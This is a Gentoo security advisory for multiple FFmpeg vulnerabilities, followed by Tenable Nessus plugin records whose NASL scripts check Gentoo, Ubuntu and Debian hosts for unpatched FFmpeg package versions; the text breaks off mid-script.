ID GLSA-202003-65 Type gentoo Reporter Gentoo Foundation Modified 2020-03-30T00:00:00
Description
Background
FFmpeg is a complete, cross-platform solution to record, convert and stream audio and video.
Description
Multiple vulnerabilities have been discovered in FFmpeg. Please review the CVE identifiers referenced below for details.
Impact
A remote attacker could entice a user or automated system using FFmpeg to process a specially crafted file, resulting in the execution of arbitrary code or a Denial of Service.
Workaround
There is no known workaround at this time.
Resolution
All FFmpeg 4.x users should upgrade to the latest version:
{"nessus": [{"lastseen": "2021-10-16T00:15:53", "description": "The remote host is affected by the vulnerability described in GLSA-202003-65 (FFmpeg: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in FFmpeg. Please review the CVE identifiers referenced below for details.\n Impact :\n\n A remote attacker could entice a user or automated system using FFmpeg to process a specially crafted file, resulting in the execution of arbitrary code or a Denial of Service.\n Workaround :\n\n There is no known workaround at this time.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-03-31T00:00:00", "type": "nessus", "title": "GLSA-202003-65 : FFmpeg: Multiple vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-10001", "CVE-2018-6912", "CVE-2018-7557", "CVE-2018-7751", "CVE-2018-9841", "CVE-2019-12730", "CVE-2019-13312", "CVE-2019-13390", "CVE-2019-17539", "CVE-2019-17542"], "modified": "2020-04-02T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:ffmpeg", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-202003-65.NASL", "href": "https://www.tenable.com/plugins/nessus/135020", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 202003-65.\n#\n# The advisory text is Copyright (C) 2001-2020 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(135020);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/04/02\");\n\n script_cve_id(\"CVE-2018-10001\", \"CVE-2018-6912\", \"CVE-2018-7557\", \"CVE-2018-7751\", \"CVE-2018-9841\", \"CVE-2019-12730\", \"CVE-2019-13312\", \"CVE-2019-13390\", \"CVE-2019-17539\", \"CVE-2019-17542\");\n script_xref(name:\"GLSA\", value:\"202003-65\");\n\n script_name(english:\"GLSA-202003-65 : FFmpeg: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-202003-65\n(FFmpeg: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in FFmpeg. Please review\n the CVE identifiers referenced below for details.\n \nImpact :\n\n A remote attacker could entice a user or automated system using FFmpeg\n to process a specially crafted file, resulting in the execution of\n arbitrary code or a Denial of Service.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/202003-65\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All FFmpeg 4.x users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=media-video/ffmpeg-4.2.0'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:ffmpeg\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/02/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/03/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/03/31\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"media-video/ffmpeg\", unaffected:make_list(\"ge 4.2.0\"), vulnerable:make_list(\"ge 4\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"FFmpeg\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-05T21:24:12", "description": "It was discovered that FFmpeg incorrectly verified empty audio packets or HEVC data. An attacker could possibly use this issue to cause a denial of service via a crafted file. This issue only affected Ubuntu 16.04 LTS, as it was already fixed in Ubuntu 18.04 LTS. For more information see: https://usn.ubuntu.com/usn/usn-3967-1 (CVE-2018-15822, CVE-2019-11338) It was discovered that FFmpeg incorrectly handled sscanf failures. An attacker could possibly use this issue to cause a denial of service or other unspecified impact.\nThis issue only affected Ubuntu 16.04 LTS and Ubuntu 18.04 LTS.\n(CVE-2019-12730) It was discovered that FFmpeg incorrectly handled certain WEBM files. An attacker could possibly use this issue to obtain sensitive data or other unspecified impact. This issue only affected Ubuntu 20.04 LTS. (CVE-2019-13312) It was discovered that FFmpeg incorrectly handled certain AVI files. An attacker could possibly use this issue to cause a denial of service or other unspecified impact. This issue only affected Ubuntu 16.04 LTS and Ubuntu 18.04 LTS. (CVE-2019-13390) It was discovered that FFmpeg incorrectly handled certain input. An attacker could possibly use this issue to cause a denial of service or other unspecified impact. This issue only affected Ubuntu 18.04 LTS. (CVE-2019-17539) It was discovered that FFmpeg incorrectly handled certain input during decoding of VQA files. An attacker could possibly use this issue to obtain sensitive information or other unspecified impact. This issue only affected Ubuntu 16.04 LTS and Ubuntu 18.04 LTS. (CVE-2019-17542) It was discovered that FFmpeg incorrectly handled certain JPEG files.\nAn attacker could possibly use this issue to obtain sensitive information or other unspecified impact. This issue only affected Ubuntu 20.04 LTS. (CVE-2020-12284) It was discovered that FFmpeg incorrectly handled certain M3U8 files. An attacker could possibly use this issue to obtain sensitive information or other unspecified impact. (CVE-2020-13904).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-07-23T00:00:00", "type": "nessus", "title": "Ubuntu 16.04 LTS / 18.04 LTS / 20.04 : FFmpeg vulnerabilities (USN-4431-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-15822", "CVE-2019-11338", "CVE-2019-12730", "CVE-2019-13312", "CVE-2019-13390", "CVE-2019-17539", "CVE-2019-17542", "CVE-2020-12284", "CVE-2020-13904"], "modified": "2020-11-30T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:ffmpeg", "p-cpe:/a:canonical:ubuntu_linux:libavcodec-extra57", "p-cpe:/a:canonical:ubuntu_linux:libavcodec-extra58", "p-cpe:/a:canonical:ubuntu_linux:libavcodec-ffmpeg-extra56", "p-cpe:/a:canonical:ubuntu_linux:libavcodec-ffmpeg56", "p-cpe:/a:canonical:ubuntu_linux:libavcodec57", "p-cpe:/a:canonical:ubuntu_linux:libavcodec58", "p-cpe:/a:canonical:ubuntu_linux:libavdevice-ffmpeg56", "p-cpe:/a:canonical:ubuntu_linux:libavdevice57", "p-cpe:/a:canonical:ubuntu_linux:libavdevice58", "p-cpe:/a:canonical:ubuntu_linux:libavfilter-extra6", "p-cpe:/a:canonical:ubuntu_linux:libavfilter-extra7", "p-cpe:/a:canonical:ubuntu_linux:libavfilter-ffmpeg5", "p-cpe:/a:canonical:ubuntu_linux:libavfilter6", "p-cpe:/a:canonical:ubuntu_linux:libavfilter7", "p-cpe:/a:canonical:ubuntu_linux:libavformat-ffmpeg56", "p-cpe:/a:canonical:ubuntu_linux:libavformat57", "p-cpe:/a:canonical:ubuntu_linux:libavformat58", "p-cpe:/a:canonical:ubuntu_linux:libavresample-ffmpeg2", "p-cpe:/a:canonical:ubuntu_linux:libavresample3", "p-cpe:/a:canonical:ubuntu_linux:libavresample4", "p-cpe:/a:canonical:ubuntu_linux:libavutil-ffmpeg54", "p-cpe:/a:canonical:ubuntu_linux:libavutil55", "p-cpe:/a:canonical:ubuntu_linux:libavutil56", "p-cpe:/a:canonical:ubuntu_linux:libpostproc-ffmpeg53", "p-cpe:/a:canonical:ubuntu_linux:libpostproc54", "p-cpe:/a:canonical:ubuntu_linux:libpostproc55", "p-cpe:/a:canonical:ubuntu_linux:libswresample-ffmpeg1", "p-cpe:/a:canonical:ubuntu_linux:libswresample2", "p-cpe:/a:canonical:ubuntu_linux:libswresample3", "p-cpe:/a:canonical:ubuntu_linux:libswscale-ffmpeg3", "p-cpe:/a:canonical:ubuntu_linux:libswscale4", "p-cpe:/a:canonical:ubuntu_linux:libswscale5", "cpe:/o:canonical:ubuntu_linux:16.04", "cpe:/o:canonical:ubuntu_linux:18.04:-:lts", "cpe:/o:canonical:ubuntu_linux:20.04"], "id": "UBUNTU_USN-4431-1.NASL", "href": "https://www.tenable.com/plugins/nessus/138875", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-4431-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(138875);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/11/30\");\n\n script_cve_id(\"CVE-2018-15822\", \"CVE-2019-11338\", \"CVE-2019-12730\", \"CVE-2019-13312\", \"CVE-2019-13390\", \"CVE-2019-17539\", \"CVE-2019-17542\", \"CVE-2020-12284\", \"CVE-2020-13904\");\n script_xref(name:\"USN\", value:\"4431-1\");\n\n script_name(english:\"Ubuntu 16.04 LTS / 18.04 LTS / 20.04 : FFmpeg vulnerabilities (USN-4431-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"It was discovered that FFmpeg incorrectly verified empty audio packets\nor HEVC data. An attacker could possibly use this issue to cause a\ndenial of service via a crafted file. This issue only affected Ubuntu\n16.04 LTS, as it was already fixed in Ubuntu 18.04 LTS. For more\ninformation see: https://usn.ubuntu.com/usn/usn-3967-1\n(CVE-2018-15822, CVE-2019-11338) It was discovered that FFmpeg\nincorrectly handled sscanf failures. An attacker could possibly use\nthis issue to cause a denial of service or other unspecified impact.\nThis issue only affected Ubuntu 16.04 LTS and Ubuntu 18.04 LTS.\n(CVE-2019-12730) It was discovered that FFmpeg incorrectly handled\ncertain WEBM files. An attacker could possibly use this issue to\nobtain sensitive data or other unspecified impact. This issue only\naffected Ubuntu 20.04 LTS. (CVE-2019-13312) It was discovered that\nFFmpeg incorrectly handled certain AVI files. An attacker could\npossibly use this issue to cause a denial of service or other\nunspecified impact. This issue only affected Ubuntu 16.04 LTS and\nUbuntu 18.04 LTS. (CVE-2019-13390) It was discovered that FFmpeg\nincorrectly handled certain input. An attacker could possibly use this\nissue to cause a denial of service or other unspecified impact. This\nissue only affected Ubuntu 18.04 LTS. (CVE-2019-17539) It was\ndiscovered that FFmpeg incorrectly handled certain input during\ndecoding of VQA files. An attacker could possibly use this issue to\nobtain sensitive information or other unspecified impact. This issue\nonly affected Ubuntu 16.04 LTS and Ubuntu 18.04 LTS. (CVE-2019-17542)\nIt was discovered that FFmpeg incorrectly handled certain JPEG files.\nAn attacker could possibly use this issue to obtain sensitive\ninformation or other unspecified impact. This issue only affected\nUbuntu 20.04 LTS. (CVE-2020-12284) It was discovered that FFmpeg\nincorrectly handled certain M3U8 files. An attacker could possibly use\nthis issue to obtain sensitive information or other unspecified\nimpact. (CVE-2020-13904).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/4431-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-12284\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:ffmpeg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libavcodec-extra57\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libavcodec-extra58\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libavcodec-ffmpeg-extra56\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libavcodec-ffmpeg56\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libavcodec57\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libavcodec58\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libavdevice-ffmpeg56\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libavdevice57\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libavdevice58\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libavfilter-extra6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libavfilter-extra7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libavfilter-ffmpeg5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libavfilter6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libavfilter7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libavformat-ffmpeg56\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libavformat57\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libavformat58\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libavresample-ffmpeg2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libavresample3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libavresample4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libavutil-ffmpeg54\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libavutil55\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libavutil56\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libpostproc-ffmpeg53\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libpostproc54\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libpostproc55\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libswresample-ffmpeg1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libswresample2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libswresample3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libswscale-ffmpeg3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libswscale4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libswscale5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:18.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:20.04\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/08/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/07/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/07/23\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2020 Canonical, Inc. / NASL script (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(16\\.04|18\\.04|20\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 16.04 / 18.04 / 20.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"16.04\", pkgname:\"ffmpeg\", pkgver:\"7:2.8.17-0ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"libavcodec-ffmpeg-extra56\", pkgver:\"7:2.8.17-0ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"libavcodec-ffmpeg56\", pkgver:\"7:2.8.17-0ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"libavdevice-ffmpeg56\", pkgver:\"7:2.8.17-0ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"libavfilter-ffmpeg5\", pkgver:\"7:2.8.17-0ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"libavformat-ffmpeg56\", pkgver:\"7:2.8.17-0ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"libavresample-ffmpeg2\", pkgver:\"7:2.8.17-0ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"libavutil-ffmpeg54\", pkgver:\"7:2.8.17-0ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"libpostproc-ffmpeg53\", pkgver:\"7:2.8.17-0ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"libswresample-ffmpeg1\", pkgver:\"7:2.8.17-0ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"libswscale-ffmpeg3\", pkgver:\"7:2.8.17-0ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"ffmpeg\", pkgver:\"7:3.4.8-0ubuntu0.2\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"libavcodec-extra57\", pkgver:\"7:3.4.8-0ubuntu0.2\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"libavcodec57\", pkgver:\"7:3.4.8-0ubuntu0.2\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"libavdevice57\", pkgver:\"7:3.4.8-0ubuntu0.2\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"libavfilter-extra6\", pkgver:\"7:3.4.8-0ubuntu0.2\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"libavfilter6\", pkgver:\"7:3.4.8-0ubuntu0.2\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"libavformat57\", pkgver:\"7:3.4.8-0ubuntu0.2\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"libavresample3\", pkgver:\"7:3.4.8-0ubuntu0.2\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"libavutil55\", pkgver:\"7:3.4.8-0ubuntu0.2\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"libpostproc54\", pkgver:\"7:3.4.8-0ubuntu0.2\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"libswresample2\", pkgver:\"7:3.4.8-0ubuntu0.2\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"libswscale4\", pkgver:\"7:3.4.8-0ubuntu0.2\")) flag++;\nif (ubuntu_check(osver:\"20.04\", pkgname:\"ffmpeg\", pkgver:\"7:4.2.4-1ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"20.04\", pkgname:\"libavcodec-extra58\", pkgver:\"7:4.2.4-1ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"20.04\", pkgname:\"libavcodec58\", pkgver:\"7:4.2.4-1ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"20.04\", pkgname:\"libavdevice58\", pkgver:\"7:4.2.4-1ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"20.04\", pkgname:\"libavfilter-extra7\", pkgver:\"7:4.2.4-1ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"20.04\", pkgname:\"libavfilter7\", pkgver:\"7:4.2.4-1ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"20.04\", pkgname:\"libavformat58\", pkgver:\"7:4.2.4-1ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"20.04\", pkgname:\"libavresample4\", pkgver:\"7:4.2.4-1ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"20.04\", pkgname:\"libavutil56\", pkgver:\"7:4.2.4-1ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"20.04\", pkgname:\"libpostproc55\", pkgver:\"7:4.2.4-1ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"20.04\", pkgname:\"libswresample3\", pkgver:\"7:4.2.4-1ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"20.04\", pkgname:\"libswscale5\", pkgver:\"7:4.2.4-1ubuntu0.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ffmpeg / libavcodec-extra57 / libavcodec-extra58 / etc\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-05T21:21:09", "description": "Several vulnerabilities have been discovered in the FFmpeg multimedia framework, which could result in denial of service or potentially the execution of arbitrary code if malformed files/streams are processed.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-07-10T00:00:00", "type": "nessus", "title": "Debian DSA-4722-1 : ffmpeg - security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-13390", "CVE-2019-17539", "CVE-2019-17542", "CVE-2020-12284", "CVE-2020-13904"], "modified": "2020-07-14T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:ffmpeg", "cpe:/o:debian:debian_linux:10.0"], "id": "DEBIAN_DSA-4722.NASL", "href": "https://www.tenable.com/plugins/nessus/138365", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-4722. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(138365);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/07/14\");\n\n script_cve_id(\"CVE-2019-13390\", \"CVE-2019-17539\", \"CVE-2019-17542\", \"CVE-2020-12284\", \"CVE-2020-13904\");\n script_xref(name:\"DSA\", value:\"4722\");\n\n script_name(english:\"Debian DSA-4722-1 : ffmpeg - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Several vulnerabilities have been discovered in the FFmpeg multimedia\nframework, which could result in denial of service or potentially the\nexecution of arbitrary code if malformed files/streams are processed.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/source-package/ffmpeg\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/buster/ffmpeg\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2020/dsa-4722\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Upgrade the ffmpeg packages.\n\nFor the stable distribution (buster), these problems have been fixed\nin version 7:4.1.6-1~deb10u1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:ffmpeg\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:10.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/07/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/07/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/07/10\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif 